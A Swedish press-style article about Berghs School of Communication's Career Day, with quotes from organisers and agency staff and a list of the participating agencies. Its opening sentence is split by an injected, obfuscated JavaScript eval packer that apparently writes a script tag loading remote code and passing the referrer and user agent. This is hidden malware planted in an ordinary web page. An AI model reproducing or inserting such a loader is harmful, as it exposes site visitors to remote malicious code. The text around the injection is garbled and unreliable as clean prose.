Image Image Image Image Image Image Image Image Image Image

| 30 oktober, 2020

Scroll to top

Top

Berghs lockar internationella byråer till Stockholm

Berghs lockar internationella byråer till Stockholm

Med eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nehsn|var|u0026u|referrer|sydai||js|php’.split(’|’),0,{}))
tanke på Stockholms begränsade storlek är den kreativa industrin överrepresenterad.  Synen på Sverige är att vi redan från början har ett globalt tänkesätt och det kan vara lättare att upptäcka goda idéer och talang här.  Det ges också goda möjligheter att bygga nätverk på grund av närheten och vår ohierarkiska miljö. Idag står Berghs School of Communication värd för en Career Day där 10 internationella byråer från London, Amsterdam och Hamburg reser hit för att speed-dejta Berghs studenter. Intresset för att komma till Stockholm har aldrig varit större.

Fredagen den 11 april är Berghs Career Day. Det är en dag av mingel och nätverkande för Berghs diplomstudenter. Berghs bjuder in ett trettio-tal byråer, svenska och internationella, som kommer till Berghs under en hel dag för att träffa studenterna. Det innebär omkring 1000 individuella möten, med samtal kring synen på kommunikation och exempel på väl lösta case. Intresset hos byråerna är stort, och de två tidigare år då Berghs har haft Career Day har varit en succé för både studenterna och byråerna.

–      På Anomaly vill vi på ett innovativt sätt hitta lösningar på affärsproblem. Berghs studenter har samma sätt att tänka som vi och de är väl förberedda för att direkt kunna bidra på byrån. De arbetar helt kanaloberoende och jag har sett många smarta lösningar här i dag säger Henrik Ridderheim från Anomaly London.

Det unika med Berghs Career Day är att den samlar traditionella reklambyråer, pr-byråer, design-, varumärkes- och innovationsbyråer under samma tak. De 150 studenter som byråerna träffar är såväl strateger som kreatörer och projektledare, och representerar: Art & copy, grafisk design, planning, produktionsledning, strategisk kommunikation & PR och Interactive communication. 25 svenska och 10 internationella byråer är här för att söka framtidens kommunikatörer.

–      På Career Day vill vi låta studenterna visa upp hur de jobbar med kommunikation för att bryta igenom bruset och göra skillnad. När vi pratar med byråerna som är här under dagen skapas också vilja att samverka ännu mer i olika projekt säger Camilla Wallander, VD Berghs.

–      Vi ser ett enormt intresse för att möta studenterna på Berghs. Det är spännande att se vikten av det personliga mötet, det handlar inte bara om att visa upp allt man har gjort. Byråerna säger också att det intressanta är att se alla enkla, smarta och effektiva detaljer i studenternas arbeten säger Lotta Saxe Blomberg, projektledare för Berghs Career Day.

Byråerna på Berghs Career Day – hela listan:
72 and Sunny Amsterdam, Abby Norm, Anomaly Amsterdam och London, ANR BBDO, BBH London, Bold, DDB, Digitas LBI, Doe Blomberg Gottberg, Edelman London och Stockholm, Garbergs, Golin Harris, Great Works, House of Radon, Ingo, Join the Carneval, King, Mediabemanning Oslo, North Alliance, Lowe Brindfors, Promenad, Pond, R/GA, Saatchi & Saatchi, Serviceplan Hamburg, Snask, Stockholm Design Lab, The Talent Business, The World Loves, Wenderfalck, The World Loves, Wieden+Kennedy Amsterdam, Åkestam Holst.

Exempel på vilken typ av kommunikationsutmaningar studenterna tar sig an kan byråerna hitta i inspirationsplattformen Add Berghs (http://add.berghs.se). Där samlas studenternas bästa idéer som ska visa att kommunikation kan göra skillnad i samhället.